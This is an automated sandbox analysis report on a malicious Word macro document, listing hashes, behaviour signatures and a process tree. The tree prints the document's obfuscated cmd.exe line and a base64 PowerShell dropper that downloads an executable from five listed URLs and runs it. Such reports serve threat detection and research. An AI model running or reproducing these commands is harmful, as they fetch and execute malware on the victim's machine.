Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
-
submitted
07/05/2024, 08:40
General
-
Target
200f08297cc9faefc5ea695ba65e90a9_JaffaCakes118.doc
-
Size
89KB
-
MD5
200f08297cc9faefc5ea695ba65e90a9
-
SHA1
f971df29a33cdbdf65cb776bc947e1f28f6d6e5e
-
SHA256
c555b4b4df8721a2d969f375d8f5fa7deba2f76dc03f32de4c5b1a8515efb02b
-
SHA512
aca15b6f4d4a4fdf564e9457867241e5af3cb9656e148cbf2f4f1eaf7cc516f4bed6f0badfbf53651cf8c05ecdb098f200a6b3ab29a048a51c2c9890b8c47a6f
-
SSDEEP
1536:lptJlmrJpmxlRw99NBD/t+alqtmmFZ/tiwp613rvDaHwwle:bte2dw99fD/LqtmQVp6laT
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://miafashionropadeportiva.com/y
exe.dropper
http://terabuild.sevencolours.eu/4bc2kL
exe.dropper
http://oztax-homepage.tonishdev.com/Lg4
exe.dropper
http://vioprotection.com.co/u
exe.dropper
http://test.helos.no/6GZ24w1
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\200f08297cc9faefc5ea695ba65e90a9_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V^ ^ ^ /c " ^se^t ^ ^ ^ ^6^bv=AACA^g^A^AIAAC^A^gA^A^I^A^AC^A^g^AA^I^A^ACA^g^A^AI^A^ACA^g^AA^IAACA^gA^Qf^A0H^A7^BAaA^M^G^A0^B^QY^AMGA9^B^wOAs^G^AhBQZ^AIHA^i^Bw^OA^MF^AuB^g^YA^QC^A^g^A^Qb^A^UGA^0B^Q^S^A^0C^A^lB^w^aA^8GA2^B^g^bA^kEA7A^QKA^MF^A^uBg^YAQCAgA^ALA0E^AvB^QW^AQCAoA^QZA^w^GA^p^B^gR^A^QG^Ah^BwbAwG^Au^B^wdA8G^AEBg^LAo^G^A^U^BQ^WAQC^A^7^BQ^eAIHA^0Bw^eA^kC^AMBgQ^AM^E^A^kA^A^IA^4^GA^p^B^AI^A0^EAvBQW^AQC^Ao^AAaA^MG^A^h^BQZ^A^IHAvBgZ^A^s^DAnAQZAgHAlB^gLAcC^Ar^Ag^W^Ak^F^A^i^B^AJ^AsC^An^A^AXAcC^ArAwY^A^kGA^sB^g^YAU^HAwB^gOA^YHA^u^BQZA^QCA^9AwUA^4GAiBAJ^As^D^AnAAN^AI^D^A^yAwJ^AAC^A9A^AI^Ao^F^A^ZB^g^Y^AQC^A7A^QKAcC^A^A^B^wJAgC^A^0^B^QaA^wG^Aw^Bw^U^A4CAn^AQM^Ac^H^A0^A^gMAo^FA^H^BgN^A8C^AvBgb^A4CA^z^Bwb^Aw^G^AlBAaA4CA0^Bwc^AUGA0BwL^A^8C^A^6A^AcA^Q^H^A0BA^a^A^A^EA^1^Bw^LA^8G^Aj^B^gL^A^0GAv^Bw^YA4CAuBwbAkG^A^0^BwYA^U^GA^0^BwbAI^H^A^wB^wb^A^kGA2^Bw^LA^8C^A6^A^AcAQH^A^0BA^a^A^A^EA0^A^wZ^Aw^E^AvA^Q^b^A^8^GAjB^gLAYH^A^l^BAZ^A^gGAz^B^Qa^A4^G^Av^B^A^d^A4CA^lBwZAEG^AwB^Q^Z^A^0^G^Av^B^Aa^A0CA^4^B^QYAQ^HA6B^w^bA^8C^Av^A^g^O^AAH^A0B^A^d^A^gG^AABA^T^AsG^AyAw^YA^I^G^A0A^w^LAUHAlBgL^AMH^A^y^B^Q^dA^8^GA^s^B^wb^AMG^Au^B^Q^ZA^YH^A^lBwcA^4C^Ak^B^A^bA^kGA1B^gY^AEGAy^BQZAQHAv^A^wLA^oDA^wB^A^d^AQ^HA^oBA^Q^AkH^AvA^QbA8^GA^j^B^g^LAE^G^A^2^B^Qa^AQH^A^yBw^b^AAH^A^l^B^AZ^AEG^Aw^Bw^b^A^I^H^AuBwb^AkGA^o^Bwc^A^EG^A^mB^Q^Y^A^k^GA^t^B^wL^A^8C^A^6A^AcAQH^A0^B^A^a^AcCA9AATA^I^E^A^DBA^JAsDA^0Bgb^A^UG^ApBA^b^A^MEA^iB^QZ^Ac^FAu^AA^d^A^UGAO^BAIA^Q^HA^jB^Q^Z^AoGAiB^wbA0C^A^3^B^Q^Z^A^4^GA9A^g^aA^Q^FAZ^B^A^J^ ^e^- ^l^l^e^hsrew^o^p& ^f^Or /^L %^w ^in ( ^1^013^ ^ ^ -^1^ ^ ^ 0)^D^O s^e^t ^m^bS=!^m^bS!!^6^bv:~ %^w, 1!&^I^f %^w == ^0 C^A^lL %^m^bS:^*^mbS^!^=% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e JABZAFQAagA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABDAEIATAA9ACcAaAB0AHQAcAA6AC8ALwBtAGkAYQBmAGEAcwBoAGkAbwBuAHIAbwBwAGEAZABlAHAAbwByAHQAaQB2AGEALgBjAG8AbQAvAHkAQABoAHQAdABwADoALwAvAHQAZQByAGEAYgB1AGkAbABkAC4AcwBlAHYAZQBuAGMAbwBsAG8AdQByAHMALgBlAHUALwA0AGIAYwAyAGsATABAAGgAdAB0AHAAOgAvAC8AbwB6AHQAYQB4AC0AaABvAG0AZQBwAGEAZwBlAC4AdABvAG4AaQBzAGgAZABlAHYALgBjAG8AbQAvAEwAZwA0AEAAaAB0AHQAcAA6AC8ALwB2AGkAbwBwAHIAbwB0AGUAYwB0AGkAbwBuAC4AYwBvAG0ALgBjAG8ALwB1AEAAaAB0AHQAcAA6AC8ALwB0AGUAcwB0AC4AaABlAGwAbwBzAC4AbgBvAC8ANgBHAFoAMgA0AHcAMQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAYgBZAFoAIAA9ACAAJwAyADIANAAnADsAJABiAG4AUwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABiAFkAWgArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAWQBvAE0AIABpAG4AIAAkAEMAQgBMACkAewB0AHIAeQB7ACQAWQBUAGoALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAWQBvAE0ALAAgACQAYgBuAFMAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAYgBuAFMAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5a1357c293f1507c0dee79ec921b61d04
SHA1e291a06ef9b06595715a54b216d868586cfc7ccc
SHA2566d9712d9fd6c500b454d02116a219f2ad405579b0418d1bb0cae2c59a2c7f2f0
SHA51291a521a528028c35835d625bd56e61d5b3f36a360eab7bf5201b04827277820310f2a06933e6fa176bef4b0785fe97d439acc359ba80b5ff348b02895ef20628
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
44KB